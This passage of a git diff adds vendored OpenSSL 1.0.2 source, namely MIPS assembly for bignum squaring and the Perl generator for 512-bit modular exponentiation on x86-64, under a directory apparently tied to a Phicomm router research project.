+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_1,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_3,a_4		/* mul_add_c2(a[3],b[4],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_1,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,56(a0)
+
+	dmultu	a_7,a_1		/* mul_add_c2(a[7],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_2,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_6,a_2		/* mul_add_c2(a[6],b[2],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_2,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_5,a_3		/* mul_add_c2(a[5],b[3],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_2,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_4,a_4		/* mul_add_c(a[4],b[4],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,64(a0)
+
+	dmultu	a_2,a_7		/* mul_add_c2(a[2],b[7],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_3,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_3,a_6		/* mul_add_c2(a[3],b[6],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_3,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_4,a_5		/* mul_add_c2(a[4],b[5],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_3,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,72(a0)
+
+	dmultu	a_7,a_3		/* mul_add_c2(a[7],b[3],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_6,a_4		/* mul_add_c2(a[6],b[4],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_1,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_5,a_5		/* mul_add_c(a[5],b[5],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,80(a0)
+
+	dmultu	a_4,a_7		/* mul_add_c2(a[4],b[7],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_2,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_5,a_6		/* mul_add_c2(a[5],b[6],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_2,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,88(a0)
+
+	dmultu	a_7,a_5		/* mul_add_c2(a[7],b[5],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_3,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_6,a_6		/* mul_add_c(a[6],b[6],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,96(a0)
+
+	dmultu	a_6,a_7		/* mul_add_c2(a[6],b[7],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,104(a0)
+
+	dmultu	a_7,a_7		/* mul_add_c(a[7],b[7],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sd	c_3,112(a0)
+	sd	c_1,120(a0)
+
+	jr	ra
+END(bn_sqr_comba8)
+
+.align	5
+LEAF(bn_sqr_comba4)
+	.set	reorder
+	ld	a_0,0(a1)
+	ld	a_1,8(a1)
+	ld	a_2,16(a1)
+	ld	a_3,24(a1)
+	dmultu	a_0,a_0		/* mul_add_c(a[0],b[0],c1,c2,c3); */
+	mflo	c_1
+	mfhi	c_2
+	sd	c_1,0(a0)
+
+	dmultu	a_0,a_1		/* mul_add_c2(a[0],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	c_3,t_2,AT
+	sd	c_2,8(a0)
+
+	dmultu	a_2,a_0		/* mul_add_c2(a[2],b[0],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_2,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	dmultu	a_1,a_1		/* mul_add_c(a[1],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,16(a0)
+
+	dmultu	a_0,a_3		/* mul_add_c2(a[0],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_3,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_1,a_2		/* mul_add_c(a2[1],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	slt	AT,t_2,zero
+	daddu	c_3,AT
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,24(a0)
+
+	dmultu	a_3,a_1		/* mul_add_c2(a[3],b[1],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_1,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	dmultu	a_2,a_2		/* mul_add_c(a[2],b[2],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	AT,c_3,t_2
+	daddu	c_1,AT
+	sd	c_2,32(a0)
+
+	dmultu	a_2,a_3		/* mul_add_c2(a[2],b[3],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	slt	c_2,t_2,zero
+	dsll	t_2,1
+	slt	a2,t_1,zero
+	daddu	t_2,a2
+	dsll	t_1,1
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,40(a0)
+
+	dmultu	a_3,a_3		/* mul_add_c(a[3],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sd	c_1,48(a0)
+	sd	c_2,56(a0)
+
+	jr	ra
+END(bn_sqr_comba4)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/modexp512-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/modexp512-x86_64.pl
new file mode 100644
index 0000000..bfd6e97
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/modexp512-x86_64.pl
@@ -0,0 +1,1497 @@
+#!/usr/bin/env perl
+#
+# Copyright (c) 2010-2011 Intel Corp.
+#   Author: Vinodh.Gopal@intel.com
+#           Jim Guilford
+#           Erdinc.Ozturk@intel.com
+#           Maxim.Perminov@intel.com
+#
+# More information about algorithm used can be found at:
+#   http://www.cse.buffalo.edu/srds2009/escs2009_submission_Gopal.pdf
+#
+# ====================================================================
+# Copyright (c) 2011 The OpenSSL Project.  All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions
+# are met:
+#
+# 1. Redistributions of source code must retain the above copyright
+#    notice, this list of conditions and the following disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright
+#    notice, this list of conditions and the following disclaimer in
+#    the documentation and/or other materials provided with the
+#    distribution.
+#
+# 3. All advertising materials mentioning features or use of this
+#    software must display the following acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+#
+# 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+#    endorse or promote products derived from this software without
+#    prior written permission. For written permission, please contact
+#    licensing@OpenSSL.org.
+#
+# 5. Products derived from this software may not be called "OpenSSL"
+#    nor may "OpenSSL" appear in their names without prior written
+#    permission of the OpenSSL Project.
+#
+# 6. Redistributions of any form whatsoever must retain the following
+#    acknowledgment:
+#    "This product includes software developed by the OpenSSL Project
+#    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+#
+# THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+# EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+# PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+# ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+# OF THE POSSIBILITY OF SUCH DAMAGE.
+# ====================================================================
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+my $win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+use strict;
+my $code=".text\n\n";
+my $m=0;
+
+#
+# Define x512 macros
+#
+
+#MULSTEP_512_ADD	MACRO	x7, x6, x5, x4, x3, x2, x1, x0, dst, src1, src2, add_src, tmp1, tmp2
+#
+# uses rax, rdx, and args
+sub MULSTEP_512_ADD
+{
+ my ($x, $DST, $SRC2, $ASRC, $OP, $TMP)=@_;
+ my @X=@$x;	# make a copy
+$code.=<<___;
+	 mov	(+8*0)($SRC2), %rax
+	 mul	$OP			# rdx:rax = %OP * [0]
+	 mov	($ASRC), $X[0]
+	 add	%rax, $X[0]
+	 adc	\$0, %rdx
+	 mov	$X[0], $DST
+___
+for(my $i=1;$i<8;$i++) {
+$code.=<<___;
+	 mov	%rdx, $TMP
+
+	 mov	(+8*$i)($SRC2), %rax
+	 mul	$OP			# rdx:rax = %OP * [$i]
+	 mov	(+8*$i)($ASRC), $X[$i]
+	 add	%rax, $X[$i]
+	 adc	\$0, %rdx
+	 add	$TMP, $X[$i]
+	 adc	\$0, %rdx
+___
+}
+$code.=<<___;
+	 mov	%rdx, $X[0]
+___
+}
+
+#MULSTEP_512	MACRO	x7, x6, x5, x4, x3, x2, x1, x0, dst, src2, src1_val, tmp
+#
+# uses rax, rdx, and args
+sub MULSTEP_512
+{
+ my ($x, $DST, $SRC2, $OP, $TMP)=@_;
+ my @X=@$x;	# make a copy
+$code.=<<___;
+	 mov	(+8*0)($SRC2), %rax
+	 mul	$OP			# rdx:rax = %OP * [0]
+	 add	%rax, $X[0]
+	 adc	\$0, %rdx
+	 mov	$X[0], $DST
+___
+for(my $i=1;$i<8;$i++) {
+$code.=<<___;
+	 mov	%rdx, $TMP
+
+	 mov	(+8*$i)($SRC2), %rax
+	 mul	$OP			# rdx:rax = %OP * [$i]
+	 add	%rax, $X[$i]
+	 adc	\$0, %rdx
+	 add	$TMP, $X[$i]
+	 adc	\$0, %rdx
+___
+}
+$code.=<<___;
+	 mov	%rdx, $X[0]
+___
+}
+
+#
+# Swizzle Macros
+#
+
+# macro to copy data from flat space to swizzled table
+#MACRO swizzle	pDst, pSrc, tmp1, tmp2
+# pDst and pSrc are modified
+sub swizzle
+{
+ my ($pDst, $pSrc, $cnt, $d0)=@_;
+$code.=<<___;
+	 mov	\$8, $cnt
+loop_$m:
+	 mov	($pSrc), $d0
+	 mov	$d0#w, ($pDst)
+	 shr	\$16, $d0
+	 mov	$d0#w, (+64*1)($pDst)
+	 shr	\$16, $d0
+	 mov	$d0#w, (+64*2)($pDst)
+	 shr	\$16, $d0
+	 mov	$d0#w, (+64*3)($pDst)
+	 lea	8($pSrc), $pSrc
+	 lea	64*4($pDst), $pDst
+	 dec	$cnt
+	 jnz	loop_$m
+___
+
+ $m++;
+}
+
+# macro to copy data from swizzled table to  flat space
+#MACRO unswizzle	pDst, pSrc, tmp*3
+sub unswizzle
+{
+ my ($pDst, $pSrc, $cnt, $d0, $d1)=@_;
+$code.=<<___;
+	 mov	\$4, $cnt
+loop_$m:
+	 movzxw	(+64*3+256*0)($pSrc), $d0
+	 movzxw	(+64*3+256*1)($pSrc), $d1
+	 shl	\$16, $d0
+	 shl	\$16, $d1
+	 mov	(+64*2+256*0)($pSrc), $d0#w
+	 mov	(+64*2+256*1)($pSrc), $d1#w
+	 shl	\$16, $d0
+	 shl	\$16, $d1
+	 mov	(+64*1+256*0)($pSrc), $d0#w
+	 mov	(+64*1+256*1)($pSrc), $d1#w
+	 shl	\$16, $d0
+	 shl	\$16, $d1
+	 mov	(+64*0+256*0)($pSrc), $d0#w
+	 mov	(+64*0+256*1)($pSrc), $d1#w
+	 mov	$d0, (+8*0)($pDst)
+	 mov	$d1, (+8*1)($pDst)
+	 lea	256*2($pSrc), $pSrc
+	 lea	8*2($pDst), $pDst
+	 sub	\$1, $cnt
+	 jnz	loop_$m
+___
+
+ $m++;
+}
+
+#
+# Data Structures
+#
+
+# Reduce Data
+#
+#
+# Offset  Value
+# 0C0     Carries
+# 0B8     X2[10]
+# 0B0     X2[9]
+# 0A8     X2[8]
+# 0A0     X2[7]
+# 098     X2[6]
+# 090     X2[5]
+# 088     X2[4]
+# 080     X2[3]
+# 078     X2[2]
+# 070     X2[1]
+# 068     X2[0]
+# 060     X1[12]  P[10]
+# 058     X1[11]  P[9]  Z[8]
+# 050     X1[10]  P[8]  Z[7]
+# 048     X1[9]   P[7]  Z[6]
+# 040     X1[8]   P[6]  Z[5]
+# 038     X1[7]   P[5]  Z[4]
+# 030     X1[6]   P[4]  Z[3]
+# 028     X1[5]   P[3]  Z[2]
+# 020     X1[4]   P[2]  Z[1]
+# 018     X1[3]   P[1]  Z[0]
+# 010     X1[2]   P[0]  Y[2]
+# 008     X1[1]   Q[1]  Y[1]
+# 000     X1[0]   Q[0]  Y[0]
+
+my $X1_offset           =  0;			# 13 qwords
+my $X2_offset           =  $X1_offset + 13*8;			# 11 qwords
+my $Carries_offset      =  $X2_offset + 11*8;			# 1 qword
+my $Q_offset            =  0;			# 2 qwords
+my $P_offset            =  $Q_offset + 2*8;			# 11 qwords
+my $Y_offset            =  0;			# 3 qwords
+my $Z_offset            =  $Y_offset + 3*8;			# 9 qwords
+
+my $Red_Data_Size       =  $Carries_offset + 1*8;			# (25 qwords)
+
+#
+# Stack Frame
+#
+#
+# offset	value
+# ...		<old stack contents>
+# ...
+# 280		Garray
+
+# 278		tmp16[15]
+# ...		...
+# 200		tmp16[0]
+
+# 1F8		tmp[7]
+# ...		...
+# 1C0		tmp[0]
+
+# 1B8		GT[7]
+# ...		...
+# 180		GT[0]
+
+# 178		Reduce Data
+# ...		...
+# 0B8		Reduce Data
+# 0B0		reserved
+# 0A8		reserved
+# 0A0		reserved
+# 098		reserved
+# 090		reserved
+# 088		reduce result addr
+# 080		exp[8]
+
+# ...
+# 048		exp[1]
+# 040		exp[0]
+
+# 038		reserved
+# 030		loop_idx
+# 028		pg
+# 020		i
+# 018		pData	; arg 4
+# 010		pG	; arg 2
+# 008		pResult	; arg 1
+# 000		rsp	; stack pointer before subtract
+
+my $rsp_offset          =  0;
+my $pResult_offset      =  8*1 + $rsp_offset;
+my $pG_offset           =  8*1 + $pResult_offset;
+my $pData_offset        =  8*1 + $pG_offset;
+my $i_offset            =  8*1 + $pData_offset;
+my $pg_offset           =  8*1 + $i_offset;
+my $loop_idx_offset     =  8*1 + $pg_offset;
+my $reserved1_offset    =  8*1 + $loop_idx_offset;
+my $exp_offset          =  8*1 + $reserved1_offset;
+my $red_result_addr_offset=  8*9 + $exp_offset;
+my $reserved2_offset    =  8*1 + $red_result_addr_offset;
+my $Reduce_Data_offset  =  8*5 + $reserved2_offset;
+my $GT_offset           =  $Red_Data_Size + $Reduce_Data_offset;
+my $tmp_offset          =  8*8 + $GT_offset;
+my $tmp16_offset        =  8*8 + $tmp_offset;
+my $garray_offset       =  8*16 + $tmp16_offset;
+my $mem_size            =  8*8*32 + $garray_offset;
+
+#
+# Offsets within Reduce Data
+#
+#
+#	struct MODF_2FOLD_MONT_512_C1_DATA {
+#	UINT64 t[8][8];
+#	UINT64 m[8];
+#	UINT64 m1[8]; /* 2^768 % m */
+#	UINT64 m2[8]; /* 2^640 % m */
+#	UINT64 k1[2]; /* (- 1/m) % 2^128 */
+#	};
+
+my $T                   =  0;
+my $M                   =  512;			# = 8 * 8 * 8
+my $M1                  =  576;			# = 8 * 8 * 9 /* += 8 * 8 */
+my $M2                  =  640;			# = 8 * 8 * 10 /* += 8 * 8 */
+my $K1                  =  704;			# = 8 * 8 * 11 /* += 8 * 8 */
+
+#
+#   FUNCTIONS
+#
+
+{{{
+#
+# MULADD_128x512 : Function to multiply 128-bits (2 qwords) by 512-bits (8 qwords)
+#                       and add 512-bits (8 qwords)
+#                       to get 640 bits (10 qwords)
+# Input: 128-bit mul source: [rdi+8*1], rbp
+#        512-bit mul source: [rsi+8*n]
+#        512-bit add source: r15, r14, ..., r9, r8
+# Output: r9, r8, r15, r14, r13, r12, r11, r10, [rcx+8*1], [rcx+8*0]
+# Clobbers all regs except: rcx, rsi, rdi
+$code.=<<___;
+.type	MULADD_128x512,\@abi-omnipotent
+.align	16
+MULADD_128x512:
+___
+	&MULSTEP_512([map("%r$_",(8..15))], "(+8*0)(%rcx)", "%rsi", "%rbp", "%rbx");
+$code.=<<___;
+	 mov	(+8*1)(%rdi), %rbp
+___
+	&MULSTEP_512([map("%r$_",(9..15,8))], "(+8*1)(%rcx)", "%rsi", "%rbp", "%rbx");
+$code.=<<___;
+	 ret
+.size	MULADD_128x512,.-MULADD_128x512
+___
+}}}
+
+{{{
+#MULADD_256x512	MACRO	pDst, pA, pB, OP, TMP, X7, X6, X5, X4, X3, X2, X1, X0
+#
+# Inputs: pDst: Destination  (768 bits, 12 qwords)
+#         pA:   Multiplicand (1024 bits, 16 qwords)
+#         pB:   Multiplicand (512 bits, 8 qwords)
+# Dst = Ah * B + Al
+# where Ah is (in qwords) A[15:12] (256 bits) and Al is A[7:0] (512 bits)
+# Results in X3 X2 X1 X0 X7 X6 X5 X4 Dst[3:0]
+# Uses registers: arguments, RAX, RDX
+sub MULADD_256x512
+{
+ my ($pDst, $pA, $pB, $OP, $TMP, $X)=@_;
+$code.=<<___;
+	mov	(+8*12)($pA), $OP
+___
+	&MULSTEP_512_ADD($X, "(+8*0)($pDst)", $pB, $pA, $OP, $TMP);
+	push(@$X,shift(@$X));
+
+$code.=<<___;
+	 mov	(+8*13)($pA), $OP
+___
+	&MULSTEP_512($X, "(+8*1)($pDst)", $pB, $OP, $TMP);
+	push(@$X,shift(@$X));
+
+$code.=<<___;
+	 mov	(+8*14)($pA), $OP
+___
+	&MULSTEP_512($X, "(+8*2)($pDst)", $pB, $OP, $TMP);
+	push(@$X,shift(@$X));
+
+$code.=<<___;
+	 mov	(+8*15)($pA), $OP
+___
+	&MULSTEP_512($X, "(+8*3)($pDst)", $pB, $OP, $TMP);
+	push(@$X,shift(@$X));
+}
+
+#
+# mont_reduce(UINT64 *x,  /* 1024 bits, 16 qwords */
+#	       UINT64 *m,  /*  512 bits,  8 qwords */
+#	       MODF_2FOLD_MONT_512_C1_DATA *data,
+#             UINT64 *r)  /*  512 bits,  8 qwords */
+# Input:  x (number to be reduced): tmp16 (Implicit)
+#         m (modulus):              [pM]  (Implicit)
+#         data (reduce data):       [pData] (Implicit)
+# Output: r (result):		     Address in [red_res_addr]
+#         result also in: r9, r8, r15, r14, r13, r12, r11, r10
+
+my @X=map("%r$_",(8..15));
+
+$code.=<<___;
+.type	mont_reduce,\@abi-omnipotent
+.align	16
+mont_reduce:
+___
+
+my $STACK_DEPTH         =  8;
+	#
+	# X1 = Xh * M1 + Xl
+$code.=<<___;
+	 lea	(+$Reduce_Data_offset+$X1_offset+$STACK_DEPTH)(%rsp), %rdi			# pX1 (Dst) 769 bits, 13 qwords
+	 mov	(+$pData_offset+$STACK_DEPTH)(%rsp), %rsi			# pM1 (Bsrc) 512 bits, 8 qwords
+	 add	\$$M1, %rsi
+	 lea	(+$tmp16_offset+$STACK_DEPTH)(%rsp), %rcx			# X (Asrc) 1024 bits, 16 qwords
+
+___
+
+	&MULADD_256x512("%rdi", "%rcx", "%rsi", "%rbp", "%rbx", \@X);	# rotates @X 4 times
+	# results in r11, r10, r9, r8, r15, r14, r13, r12, X1[3:0]
+
+$code.=<<___;
+	 xor	%rax, %rax
+	# X1 += xl
+	 add	(+8*8)(%rcx), $X[4]
+	 adc	(+8*9)(%rcx), $X[5]
+	 adc	(+8*10)(%rcx), $X[6]
+	 adc	(+8*11)(%rcx), $X[7]
+	 adc	\$0, %rax
+	# X1 is now rax, r11-r8, r15-r12, tmp16[3:0]
+
+	#
+	# check for carry ;; carry stored in rax
+	 mov	$X[4], (+8*8)(%rdi)			# rdi points to X1
+	 mov	$X[5], (+8*9)(%rdi)
+	 mov	$X[6], %rbp
+	 mov	$X[7], (+8*11)(%rdi)
+
+	 mov	%rax, (+$Reduce_Data_offset+$Carries_offset+$STACK_DEPTH)(%rsp)
+
+	 mov	(+8*0)(%rdi), $X[4]
+	 mov	(+8*1)(%rdi), $X[5]
+	 mov	(+8*2)(%rdi), $X[6]
+	 mov	(+8*3)(%rdi), $X[7]
+
+	# X1 is now stored in: X1[11], rbp, X1[9:8], r15-r8
+	# rdi -> X1
+	# rsi -> M1
+
+	#
+	# X2 = Xh * M2 + Xl
+	# do first part (X2 = Xh * M2)
+	 add	\$8*10, %rdi			# rdi -> pXh ; 128 bits, 2 qwords
+				#        Xh is actually { [rdi+8*1], rbp }
+	 add	\$`$M2-$M1`, %rsi			# rsi -> M2
+	 lea	(+$Reduce_Data_offset+$X2_offset+$STACK_DEPTH)(%rsp), %rcx			# rcx -> pX2 ; 641 bits, 11 qwords
+___
+	unshift(@X,pop(@X));	unshift(@X,pop(@X));
+$code.=<<___;
+
+	 call	MULADD_128x512			# args in rcx, rdi / rbp, rsi, r15-r8
+	# result in r9, r8, r15, r14, r13, r12, r11, r10, X2[1:0]
+	 mov	(+$Reduce_Data_offset+$Carries_offset+$STACK_DEPTH)(%rsp), %rax
+
+	# X2 += Xl
+	 add	(+8*8-8*10)(%rdi), $X[6]		# (-8*10) is to adjust rdi -> Xh to Xl
+	 adc	(+8*9-8*10)(%rdi), $X[7]
+	 mov	$X[6], (+8*8)(%rcx)
+	 mov	$X[7], (+8*9)(%rcx)
+
+	 adc	%rax, %rax
+	 mov	%rax, (+$Reduce_Data_offset+$Carries_offset+$STACK_DEPTH)(%rsp)
+
+	 lea	(+$Reduce_Data_offset+$Q_offset+$STACK_DEPTH)(%rsp), %rdi			# rdi -> pQ ; 128 bits, 2 qwords
+	 add	\$`$K1-$M2`, %rsi			# rsi -> pK1 ; 128 bits, 2 qwords
+
+	# MUL_128x128t128	rdi, rcx, rsi	; Q = X2 * K1 (bottom half)
+	# B1:B0 = rsi[1:0] = K1[1:0]
+	# A1:A0 = rcx[1:0] = X2[1:0]
+	# Result = rdi[1],rbp = Q[1],rbp
+	 mov	(%rsi), %r8			# B0
+	 mov	(+8*1)(%rsi), %rbx			# B1
+
+	 mov	(%rcx), %rax			# A0
+	 mul	%r8			# B0
+	 mov	%rax, %rbp
+	 mov	%rdx, %r9
+
+	 mov	(+8*1)(%rcx), %rax			# A1
+	 mul	%r8			# B0
+	 add	%rax, %r9
+
+	 mov	(%rcx), %rax			# A0
+	 mul	%rbx			# B1
+	 add	%rax, %r9
+
